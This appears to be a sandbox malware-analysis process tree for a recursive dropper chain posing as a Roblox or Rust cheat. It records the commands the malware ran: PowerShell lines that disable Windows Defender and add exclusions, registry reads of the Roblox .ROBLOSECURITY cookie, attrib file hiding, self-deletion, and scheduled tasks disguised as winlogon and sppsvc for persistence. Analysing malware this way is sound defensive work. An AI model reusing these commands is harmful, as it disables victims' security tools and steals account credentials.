        C:\Users\Admin\AppData\Local\Temp\Loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
        45⤵
        
        PID:1632
        
        C:\Users\Admin\AppData\Local\Temp\XClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\XClient.exe"
        46⤵
        
        PID:3040
        
        C:\Users\Admin\AppData\Local\Temp\RustCheat.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"
        46⤵
        Drops file in Drivers directory
        
        PID:2572
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        47⤵
        
        PID:484
        
        C:\Windows\system32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"
        47⤵
        Views/modifies file attributes
        
        PID:2708
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\RustCheat.exe'
        47⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2904
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        47⤵
        
        PID:2068
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        47⤵
        
        PID:2224
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        47⤵
        
        PID:536
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        47⤵
        
        PID:2940
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        47⤵
        
        PID:1564
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        47⤵
        
        PID:1744
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        47⤵
        
        PID:1664
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        47⤵
        Detects videocard installed
        
        PID:320
        
        C:\Windows\system32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\RustCheat.exe" && pause
        47⤵
        
        PID:944
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        48⤵
        Runs ping.exe
        
        PID:2068
        
        C:\Users\Admin\AppData\Local\Temp\sol.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sol.exe"
        45⤵
        
        PID:2704
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
        46⤵
        
        PID:2208
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
        47⤵
        Loads dropped DLL
        
        PID:1532
        
        C:\hostNet\bridgeblockportComBroker.exe
        
        "C:\hostNet/bridgeblockportComBroker.exe"
        48⤵
        
        PID:1536
        
        C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
        45⤵
        
        PID:2928
        
        C:\Users\Admin\AppData\Local\Temp\Loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
        46⤵
        
        PID:1240
        
        C:\Users\Admin\AppData\Local\Temp\sol.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sol.exe"
        46⤵
        
        PID:1620
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
        47⤵
        
        PID:1188
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
        48⤵
        Loads dropped DLL
        
        PID:1580
        
        C:\hostNet\bridgeblockportComBroker.exe
        
        "C:\hostNet/bridgeblockportComBroker.exe"
        49⤵
        
        PID:1276
        
        C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
        46⤵
        
        PID:1672
        
        C:\Users\Admin\AppData\Local\Temp\Loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
        47⤵
        
        PID:1044
        
        C:\Users\Admin\AppData\Local\Temp\sol.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sol.exe"
        47⤵
        
        PID:2520
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
        48⤵
        
        PID:1232
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
        49⤵
        Loads dropped DLL
        
        PID:1576
        
        C:\hostNet\bridgeblockportComBroker.exe
        
        "C:\hostNet/bridgeblockportComBroker.exe"
        50⤵
        
        PID:344
        
        C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
        47⤵
        
        PID:2072
        
        C:\Users\Admin\AppData\Local\Temp\Loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
        48⤵
        
        PID:1076
        
        C:\Users\Admin\AppData\Local\Temp\sol.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sol.exe"
        48⤵
        
        PID:1752
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
        49⤵
        
        PID:1928
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
        50⤵
        Loads dropped DLL
        
        PID:2084
        
        C:\hostNet\bridgeblockportComBroker.exe
        
        "C:\hostNet/bridgeblockportComBroker.exe"
        51⤵
        
        PID:2404
        
        C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
        48⤵
        
        PID:2592
        
        C:\Users\Admin\AppData\Local\Temp\Loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
        49⤵
        
        PID:2608
        
        C:\Users\Admin\AppData\Local\Temp\sol.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sol.exe"
        49⤵
        
        PID:2960
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
        50⤵
        
        PID:2504
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
        51⤵
        Loads dropped DLL
        
        PID:2728
        
        C:\hostNet\bridgeblockportComBroker.exe
        
        "C:\hostNet/bridgeblockportComBroker.exe"
        52⤵
        
        PID:1080
        
        C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
        49⤵
        
        PID:2000
        
        C:\Users\Admin\AppData\Local\Temp\Loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
        50⤵
        
        PID:1748
        
        C:\Users\Admin\AppData\Local\Temp\sol.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sol.exe"
        50⤵
        
        PID:1672
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
        51⤵
        
        PID:2656
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
        52⤵
        Loads dropped DLL
        
        PID:2492
        
        C:\hostNet\bridgeblockportComBroker.exe
        
        "C:\hostNet/bridgeblockportComBroker.exe"
        53⤵
        
        PID:1604
        
        C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
        50⤵
        
        PID:1980
        
        C:\Users\Admin\AppData\Local\Temp\Loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
        51⤵
        
        PID:2304
        
        C:\Users\Admin\AppData\Local\Temp\sol.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sol.exe"
        51⤵
        
        PID:1492
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
        52⤵
        
        PID:2828
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
        53⤵
        Loads dropped DLL
        
        PID:2204
        
        C:\hostNet\bridgeblockportComBroker.exe
        
        "C:\hostNet/bridgeblockportComBroker.exe"
        54⤵
        
        PID:2820
        
        C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
        51⤵
        
        PID:1144
        
        C:\Users\Admin\AppData\Local\Temp\Loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
        52⤵
        
        PID:3048
        
        C:\Users\Admin\AppData\Local\Temp\sol.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sol.exe"
        52⤵
        
        PID:1480
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
        53⤵
        
        PID:2064
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
        54⤵
        Loads dropped DLL
        
        PID:912
        
        C:\hostNet\bridgeblockportComBroker.exe
        
        "C:\hostNet/bridgeblockportComBroker.exe"
        55⤵
        
        PID:3020
        
        C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
        52⤵
        
        PID:2676
        
        C:\Users\Admin\AppData\Local\Temp\Loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
        53⤵
        
        PID:1824
        
        C:\Users\Admin\AppData\Local\Temp\sol.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sol.exe"
        53⤵
        
        PID:944
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
        54⤵
        
        PID:348
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
        55⤵
        Loads dropped DLL
        
        PID:2984
        
        C:\hostNet\bridgeblockportComBroker.exe
        
        "C:\hostNet/bridgeblockportComBroker.exe"
        56⤵
        
        PID:468
        
        C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
        53⤵
        
        PID:2516
        
        C:\Users\Admin\AppData\Local\Temp\Loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
        54⤵
        
        PID:2436
        
        C:\Users\Admin\AppData\Local\Temp\XClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\XClient.exe"
        55⤵
        
        PID:2808
        
        C:\Users\Admin\AppData\Local\Temp\RustCheat.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"
        55⤵
        
        PID:1552
        
        C:\Users\Admin\AppData\Local\Temp\sol.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sol.exe"
        54⤵
        
        PID:1200
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
        55⤵
        
        PID:2432
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
        56⤵
        Loads dropped DLL
        
        PID:2708
        
        C:\hostNet\bridgeblockportComBroker.exe
        
        "C:\hostNet/bridgeblockportComBroker.exe"
        57⤵
        
        PID:924
        
        C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
        54⤵
        
        PID:2456
        
        C:\Users\Admin\AppData\Local\Temp\Loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
        55⤵
        
        PID:1060
        
        C:\Users\Admin\AppData\Local\Temp\XClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\XClient.exe"
        56⤵
        
        PID:868
        
        C:\Users\Admin\AppData\Local\Temp\RustCheat.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"
        56⤵
        
        PID:1580
        
        C:\Users\Admin\AppData\Local\Temp\sol.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sol.exe"
        55⤵
        
        PID:2832
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
        56⤵
        
        PID:1476
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
        57⤵
        Loads dropped DLL
        
        PID:2792
        
        C:\hostNet\bridgeblockportComBroker.exe
        
        "C:\hostNet/bridgeblockportComBroker.exe"
        58⤵
        
        PID:1148
        
        C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
        55⤵
        
        PID:1504
        
        C:\Users\Admin\AppData\Local\Temp\Loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
        56⤵
        
        PID:1756
        
        C:\Users\Admin\AppData\Local\Temp\XClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\XClient.exe"
        57⤵
        
        PID:2376
        
        C:\Users\Admin\AppData\Local\Temp\RustCheat.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"
        57⤵
        Drops file in Drivers directory
        
        PID:1492
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        58⤵
        
        PID:2492
        
        C:\Windows\system32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"
        58⤵
        Views/modifies file attributes
        
        PID:2928
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\RustCheat.exe'
        58⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1752
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        58⤵
        
        PID:2040
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        58⤵
        
        PID:2932
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        58⤵
        
        PID:2520
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        58⤵
        
        PID:1504
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        58⤵
        
        PID:1740
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        58⤵
        
        PID:3052
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        58⤵
        
        PID:2632
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        58⤵
        Detects videocard installed
        
        PID:1540
        
        C:\Windows\system32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\RustCheat.exe" && pause
        58⤵
        
        PID:3004
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        59⤵
        Runs ping.exe
        
        PID:784
        
        C:\Users\Admin\AppData\Local\Temp\sol.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sol.exe"
        56⤵
        
        PID:2732
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
        57⤵
        
        PID:964
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
        58⤵
        Loads dropped DLL
        
        PID:2276
        
        C:\hostNet\bridgeblockportComBroker.exe
        
        "C:\hostNet/bridgeblockportComBroker.exe"
        59⤵
        
        PID:2332
        
        C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
        56⤵
        
        PID:1480
        
        C:\Users\Admin\AppData\Local\Temp\Loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
        57⤵
        
        PID:1200
        
        C:\Users\Admin\AppData\Local\Temp\XClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\XClient.exe"
        58⤵
        
        PID:2484
        
        C:\Users\Admin\AppData\Local\Temp\RustCheat.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"
        58⤵
        
        PID:2508
        
        C:\Users\Admin\AppData\Local\Temp\sol.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sol.exe"
        57⤵
        
        PID:2296
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
        58⤵
        
        PID:1716
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
        59⤵
        Loads dropped DLL
        
        PID:2112
        
        C:\hostNet\bridgeblockportComBroker.exe
        
        "C:\hostNet/bridgeblockportComBroker.exe"
        60⤵
        
        PID:2240
        
        C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
        57⤵
        
        PID:2956
        
        C:\Users\Admin\AppData\Local\Temp\Loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
        58⤵
        
        PID:2044
        
        C:\Users\Admin\AppData\Local\Temp\XClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\XClient.exe"
        59⤵
        
        PID:3024
        
        C:\Users\Admin\AppData\Local\Temp\RustCheat.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"
        59⤵
        
        PID:2060
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        60⤵
        
        PID:1604
        
        C:\Users\Admin\AppData\Local\Temp\sol.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sol.exe"
        58⤵
        
        PID:1564
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
        59⤵
        
        PID:1636
        
        C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
        58⤵
        
        PID:3032
        
        C:\Users\Admin\AppData\Local\Temp\Loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
        59⤵
        
        PID:320
        
        C:\Users\Admin\AppData\Local\Temp\sol.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sol.exe"
        59⤵
        
        PID:2864
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
        60⤵
        
        PID:2500
        
        C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
        59⤵
        
        PID:484
        
        C:\Users\Admin\AppData\Local\Temp\Loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
        60⤵
        
        PID:2296
        
        C:\Users\Admin\AppData\Local\Temp\sol.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sol.exe"
        60⤵
        
        PID:1052
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
        61⤵
        
        PID:2640
        
        C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
        60⤵
        
        PID:2108
        
        C:\Users\Admin\AppData\Local\Temp\Loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
        61⤵
        
        PID:1232
        
        C:\Users\Admin\AppData\Local\Temp\sol.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sol.exe"
        61⤵
        
        PID:2984
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
        62⤵
        
        PID:1752
        
        C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
        61⤵
        
        PID:2732
        
        C:\Users\Admin\AppData\Local\Temp\Loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
        62⤵
        
        PID:2116
        
        C:\Users\Admin\AppData\Local\Temp\sol.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sol.exe"
        62⤵
        
        PID:2180
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
        63⤵
        
        PID:1100
        
        C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
        62⤵
        
        PID:2632
        
        C:\Users\Admin\AppData\Local\Temp\Loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
        63⤵
        
        PID:1928
        
        C:\Users\Admin\AppData\Local\Temp\sol.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sol.exe"
        63⤵
        
        PID:1208
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
        64⤵
        
        PID:2532
        
        C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
        63⤵
        
        PID:1744
        
        C:\Users\Admin\AppData\Local\Temp\Loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
        64⤵
        
        PID:296
        
        C:\Users\Admin\AppData\Local\Temp\sol.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sol.exe"
        64⤵
        
        PID:2964
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
        65⤵
        
        PID:1684
        
        C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
        64⤵
        
        PID:2900
        
        C:\Users\Admin\AppData\Local\Temp\Loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
        65⤵
        
        PID:1144
        
        C:\Users\Admin\AppData\Local\Temp\sol.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sol.exe"
        65⤵
        
        PID:2488
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
        66⤵
        
        PID:2224
        
        C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
        65⤵
        
        PID:2668
        
        C:\Users\Admin\AppData\Local\Temp\Loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
        66⤵
        
        PID:3016
        
        C:\Users\Admin\AppData\Local\Temp\sol.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sol.exe"
        66⤵
        
        PID:1044
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
        67⤵
        
        PID:1364
        
        C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
        66⤵
        
        PID:2828
        
        C:\Users\Admin\AppData\Local\Temp\Loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
        67⤵
        
        PID:2084
        
        C:\Users\Admin\AppData\Local\Temp\sol.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sol.exe"
        67⤵
        
        PID:1508
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
        68⤵
        
        PID:2028
        
        C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
        67⤵
        
        PID:1484
        
        C:\Users\Admin\AppData\Local\Temp\Loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
        68⤵
        
        PID:2840
        
        C:\Users\Admin\AppData\Local\Temp\sol.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sol.exe"
        68⤵
        
        PID:1780
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
        69⤵
        
        PID:1232
        
        C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
        68⤵
        
        PID:1840

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 9 /tr "'C:\hostNet\winlogon.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2936

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "winlogon" /sc ONLOGON /tr "'C:\hostNet\winlogon.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1728

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 11 /tr "'C:\hostNet\winlogon.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2984

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "wscriptw" /sc MINUTE /mo 10 /tr "'C:\Windows\system\wscript.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2920

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "wscript" /sc ONLOGON /tr "'C:\Windows\system\wscript.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1732

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "wscriptw" /sc MINUTE /mo 7 /tr "'C:\Windows\system\wscript.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2892

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\10\sppsvc.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2868

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sppsvc" /sc ONLOGON /tr "'C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\10\sppsvc.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2616

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\10\sppsvc.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1152

C:\Windows\system32\schtasks.exe
